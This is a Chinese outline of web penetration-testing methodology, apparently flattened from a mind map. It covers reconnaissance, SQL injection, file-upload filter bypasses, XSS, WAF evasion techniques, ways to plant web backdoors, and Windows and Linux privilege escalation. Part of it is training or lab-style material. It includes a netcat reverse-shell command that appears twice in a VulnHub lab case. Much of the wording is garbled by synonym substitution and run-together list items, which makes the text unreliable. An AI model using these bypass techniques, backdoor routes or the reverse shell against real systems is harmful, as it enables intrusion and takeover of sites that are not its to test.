信息网络Web(无CDN)子域名
· 工具:layer subdomain
· 主站安全较高,可以通过子域名进行打破
· 工具:nmap masscan

· 网站端口及做事越多,相对的漏洞也会越多
网站目录· 工具:dirbuster dirsearch
· 目录扫描会得到更多的敏感信息,如源码或数据库备份文件,旧版入口网站等
CMS指纹· 工具:bugscaner cmsmap
· 直接便于查找指定网站程序的漏洞信息
旁注C段· 工具:第三方接口
· 基于同做事器和同网段的站点进行剖析
四大件· 中间件
• 脚本类型
· 操作系统
• 数据库类型
域名信息· 站长信息
· 备案信息
• DNS信息
结合其他运用· APP或第三方运用
· 网站插件及模版
工具脚本凑集· https://www.uedbox.com/tools/type/webapp/
· fuzzscanner
为后期的漏洞测试漏洞利用做准备做爆破字典的天生设计,社工多创造这类运用便于漏洞创造的最大化App抓包剖析反编译逆向利用类似burp抓包获取app涉及到的Web信息,再转至Web层面安全测试获取抓包抓不到的其他信息,接口,Web等客户端抓包剖析反编译逆向利用类似findder抓包获取app涉及到的Web信息,再转至Web层面安全测试获取抓包抓不到的其他信息,接口,Web等漏洞分类Web层面SQL注入· 数据库类型
• access
• 只能猜解数据库信息
• sqlserver
• 数据库信息(单个或全部)
• 文件操作(读取,写入)
• 注册表,命令实行等
• 取决于当前注入权限,sa db public权限
• mysql
• 数据库信息(单个或全部)
• 文件操作(读取,写入)
• 取决于当前注入权限,root或非root权限
• oracle
• MongoDB
• postsql
• .......
· 参数类型
• 数字型
• 无符号滋扰
• 字符型
• 单引号滋扰
• 搜索型
• 单引号百分号滋扰
• SQL命令中各种参数值会利用符号进行闭合
· 提交办法
• GET
• POST
• COOKIE
• HTTP
• 数据通报会有各种要求办法,以是要以精确的请交办法去测试注入
· 其他问题
• 加解密
• 加解码
• 二次注入
• 盲注
• 延时注入
•
•
• 防注入
• 程序防注入
• waf产品
• 脚本函数
• 各种繁芜的注入问题
文件上传· 客户端
• JS本地验证
· 做事端
• 检测后缀
• 黑名单
• 直接上传脚本类型
• 上传.htaccess
• 后缀名大小写绕过
• 符号点绕过
• 空格绕过
• ::$DATA绕过
• 解析漏洞
• 双后缀名绕过
• 白名单
• MIME绕过
• %00截断
• 0x00截断
• 0x0a截断
• 检测内容
• 文件头检测
• getimagesize()打破
• exif_imagetype()打破
• 二次渲染
• 其他
• 条件竞争
XSS跨站· 反射型
· 存储型
· DOM型
· 大略的xss类型,非持续型的攻击
· 大略的xss类型,持续型攻击,攻击语句会存储至数据库中
· 界面的xss类型,伪装的一种攻击,仿照按钮图像等
文件包含· 本地包含
· 远程包含
代码实行命令实行反序列化目录遍历· 文件泄露
· 目录安全
· 做事器或中间件的权限设置不当,导致网站路径或备份文件等敏感数据透露,可勇扫描脚本工具探针
· 目录的读取操作问题,掌握变量未进行过滤导致的目录超过的问题,如文件管理:file.php?=../../
变量覆盖其他· csrf
· ssrf
· xxe xml
· json
· 下载
· 逻辑
· 越权
• 垂直越权
• 水平越权
• 跨权限
• 同权限
· 参考:Web攻防之业务安全实战指南
· 跨站点要求假造,同源策略的防御方法
· 紧张浸染在内网进行信息探针,漏洞漏洞一块
· 网站的xml脚本导致的安全问题
· 网站处理文件下载时,未过滤传入的文件名的参数,可以利用该漏洞进行网站的敏感文件下载。如数据库配置文件等
获取数据库信息,部分可以获取Web权限,文件操作等,安全测试工具:sqlmap直接通过上传获取Web权限植入后门,安全测试工具:burpsuite紧张获取管理员Cookie信息,可结合其他攻击办法,安全测试工具:beef xsser直接通过文件包含后门获取权限脚本函数导致的代码被实行,将后门或者敏感操作代码进行脚本实行(thinkphp代码实行漏洞)脚本函数调用系统的COM组件的安全问题,一样平常可以用于调用实行系统命令,如CMD脚本中字符串处理不当导致该漏洞可利用出其他漏洞将原始变量的值进行覆盖,导致数据被更换,一样平常常结合其他漏洞利用可通过Pikachu靶场进行测试系统层面溢出提权中间件层面弱口令各种漏洞其他层面未授权访问第三方软件参考:未授权访问漏洞凑集带环境及解题参考:Web中间件常见漏洞总结漏洞创造WEBCMS· 已知CMS
• 通过漏洞平台进行漏洞查找
• 下载获取源码进行代码审计
· 未知CMS
• 小众或冷门的程序源码搭建
· 内部源码
• 内部团队开拓的程序源码
· 网站源码采取网上公开的脚本程序搭建,如dedecms discuz wordpress等
· 常见的测试,可用AWVS或Appscan等安全扫描工具进行漏洞探针
黑盒· 无源码无目标干系信息的测试
· 部分漏洞不能创造,如:二次注入,变量覆盖,反序列化等
白盒· 有源码有目标干系信息的测试
• 通过漏洞平台进行漏洞查找
• 下载获取源码进行代码审计
子域名目录端口IPCMS识别可利用bugscanner或云悉等识别平台通过目标的子域名获取后,再进行子域名目标的安全测试,一样平常是直接目标的难度较大采取的方案网站搭建的习气问题导致的思路,例子:xx.com(dedecms) xx.com/old(aspcms) xx.com/bbs(discuz) 三个目标网站搭建的习气问题导致的思路,例子:xx.com(dedecms) xx.com:8000(aspcms) xx.com:8080/(discuz) 三个目标网站搭建平台或解析问题导致,可利用IP进行信息网络,扫描敏感文件等操作系统中间件其他PhpmyadminSVNopensshimagemagick。。。。WEB或做事器利用第三方软件或插件导致的安全漏洞,紧张利用搜索引擎或漏洞平台获取从做事器入手,漏洞创造紧张用Nessus,巡风,Nmap等扫描探针参考:Web中间件常见漏洞总结漏洞利用POC,EXP例子:PHPCMS2008 comment.php 注入EXP根据EXP的代码格式,选用对应的安装环境的解析器进行实行解析操作脚本代码WEB运用各种漏洞,上传,代码实行等编程代码系统提权漏洞代码,须要编译环境进行编译工具插件https://www.uedbox.com/?s=%E6%8F%92%E4%BB%B6MSF,Nmap,Sqlmap,Burpsuite等疑难杂症WAF绕过产品· 软件
• 安全狗
• D盾
• 宝塔
• 安骑士
• 护卫神
• 。。。。
· 硬件
• 安全产品
剖析· 识别
• Wafw00f
· 研究
• 搭建安装
• FUZZ
• 抓包
• 查看配置
绕过· 影响元素
• 产品种别
• 网站环境
• 攻击方法
• SQL注入
• 文件上传
• XSS跨站
• 文件包含
• 目录扫描
• 。。。。
• 常见的漏洞攻击方法
• WAF产品的名称
• WEB运用的搭建环境
· 绕过技能
• SQL注入
• 关键字更换(等价更换)
• 大小写
• 分外符号(注释符)
• 数据库特性
• 提交办法
• 文件上传
• 变动上传参数
• 00截断
• 去符号防匹配
• 多参数(HPP污染)
• 换行截断
• 参考前面的WAF录像
• 后门代码
• 代码层
• 等价函数更换
• 大小写
• 多变量
• 自定义函数
• 加密编码
• 数据提交参数
• 等价更换敏感函数防WAF匹配
• 利用大小写逻辑问题防匹配
• 变量覆盖思路将带有敏感的变量进行伪装防匹配
• 自写函数打造敏感函数的功能
• 伪装敏感数据防匹配
• 将敏感数据进行提交通报不在代码中表示
• 行为层
• 修正工具指纹
• 修正原始代码
• 修正要求来源
• 黑名单
• 变动来源
• 白名单
• 变动来源
• VPN软件
• X-forward假造
• 修正原有工具的指纹信息防匹配,一样平常为HTTP要求数据包信息
• 将实现功能的代码部分进行二次开拓,修正方法参考代码层绕过
• 通用绕过方案
• 目录扫描
• 延迟扫描
• 代理扫描
• 仿照搜索引擎
• 。。。。
• 参考:https://www.anquanke.com/post/id/173474?from=timeline
· 均可采取模糊测试Fuzz进行测试
WAF会对web运用的干系攻击进行过滤后门获取漏洞直接获取· 如mysql注入进行文件写入
· 如上传漏洞直接上传文件
· 如文件包含直接包含后门
· 如命令实行利用命令写入
· 。。。。。。。。
后台权限获取· 如利用数据库备份将图片格式备份至脚本格式
· 如文件管理器进行文件创建写入代码操作
· 如SQL命令进行后门文件的写入
· 如修正网站配置文件写入后门代码
· 如利用后台文件上传功能上传后门文件
· 。。。。。。。
其他攻击获取· 如FTP爆破后进行后门文件上传
· 如phpmyadmin登录后进行sql命令写入
· 如做事器系统漏洞获取系统权限植入WEB后门
· 如旁注站点权限获取后植入后门文件
· 如中间件漏洞获取干系权限后植入后门文件
· 。。。。。。。。。。。。
通过各种路子获取WEB后门权限的先容各种问题漏洞创造不了?· 是否信息网络全面?
· 是否工具利用全面?
· 是否须要手工合营?
· 是否从源码入手?
· 端口站点,目录站点,子域名,旁注等信息均以测试?
· 常见扫描工具AWVS,Appscan,各大扫描平台等都扫描测试?
· 部分漏洞可能工具无法探针,须要合营手工进行安全测试?
· 代码审计层面的漏洞挖掘操作呢?
漏洞利用失落败?· WAF?
· 漏洞是否存在?
· 其他
· 网上漏洞代码缺点等
权限获取不了?· 中间件脚本实行权限设置
· WAF
· 网站某些目录设置了不实行脚本格式
后渗透问题?其他权限提升操作系统Windows· 数据库
• Mssql
• sa权限
• 数据库连接工具进行xp_cmdshell提权
• Mysql
• root权限
• UDF提权
• MOF提权
• 启动项提权
• 漏洞提权
• 提权脚本或工具进行
• Oracle
• 。。。
• 密码获取方法
• 读取网站的数据库配置文件,如conn,config,sql,data等关键字文件
• 利用爆破脚本进行数据库密码猜解
• 利用数据库备份文件进行搭建查询
• 利用数据库文件进行读取(mysql)
• 条件:获取数据库最高权限用户密码,借助数据库用户进行权限提升
· 系统溢出
• CVE或MS编号等EXP
• 网络信息
• 操作系统
• 位数
• 版本信息
• 补丁信息
• 网络信息
• 端口信息
• 筛选可用提权Poc,tasklist /svc ver systeminfo whoami
• 后续掌握渗透做准备,netstat -ano ipconfig /all
• 第三方软件提权做铺垫,netstat -ano
• 探求可读写目录
• 上传实行的CMD
• 上传可用POC
• 调用cmd实行poc
• 后续掌握
• 3389掌握
• 远控掌握
• 终端掌握
• 方便,内网做事器须要端口转发
• 办理内网问题,须要制订工具软件
• 方便,无图像化操作
• 获取系统权限
• 自动检测:项目地址:https://github.com/GDSSecurity/Windows-Exploit-Suggesterhttps://github.com/jondonas/linux-exploit-suggester-2安装:1.python windows-exploit-suggester.py --update (python2)2.pip install xlrd --upgrade 安装插件库3.python windows-exploit-suggester.py --database 2019-xx.xls --systeminfo xx.txt案例1:Windows 2008/7 test案例2:Linux-DC-1 vunlhub test https://www.vulnhub.com/entry/dc-1-1,292/https://www.jianshu.com/p/0c22c450f971find suidtest -exec netcat -e /bin/sh 192.168.x.x 1234 \;Windows凑集归类:https://github.com/SecWiki/windows-kernel-exploitslinux凑集归类:https://github.com/SecWiki/linux-kernel-exploits本地联网漏扫:Vulmap https://github.com/vulmon/Vulmap/
· 第三方软件
• Serv-u
• radmin
• pcanywhere
• vnc
• zend
• ......
• 以第三方软件的用户密码做条件进行权限提升,有部分是存在提权漏洞
Linux· 数据库
· 系统溢出
• 网络信息
• 内核信息
• 网络信息
• 上传POC至/tmp目录
• 反弹Shell
• 实行POC
• 无权限实行
• chmod 777 poc 授予poc文件实行权限
• 报错或失落败
• EXP问题或无此类提权漏洞
• 后续掌握
• 终端掌握
• 借助反弹脚本或webshell自带功能
· 其他
• SUID提权
• 案例:Linux-DC-1 vunlhub test https://www.vulnhub.com/entry/dc-1-1,292/https://www.jianshu.com/p/0c22c450f971find suidtest -exec netcat -e /bin/sh 192.168.x.x 1234 \;
内网安全信息网络网络信息· IP地址
· 内外网
· 网卡
· 对应网络连接的打算机
· 用来评估当前安全测试目标的网络架构
密码信息· 打算机用户密码
· 数据库用户密码
· 软件及其他密码
· 用来后续的密码字典制作从而进行弱口令攻击
端口信息· 开放端口及对应做事
· 当前端口连接的打算机
· 用于后续做事攻击做准备
文件信息· 密码记录文件
· 数据备份文件
· 日志记录文件
· 各种敏感文件
· 剖析做事器用场及网络的角色
其他信息网络架构攻击办法特有· ARP嗅探
· 会话挟制
· DNS挟制
· 钓鱼攻击
· 。。。。
常规· 弱口令攻击
· 做事攻击
· 系统攻击
· WEB攻击
平台:MSF 推举:Powershell框架 nishang参考文章:https://www.4hou.com/technology/5962.html#下载地址:https://github.com/samratashok/nishang#安装问题nishang的利用是要在PowerShell3.0以上的环境中才可以正常利用。也便是说win7下是有点小问题的。win7下自带的环境是PowerShell 2.0https://www.uedbox.com/tools/攻防比赛应急相应有CDNCDN绕过旨在网络更全面的信息,为后期漏洞创造打好根本办理权限问题导致的操作失落败等,后渗透准备事情8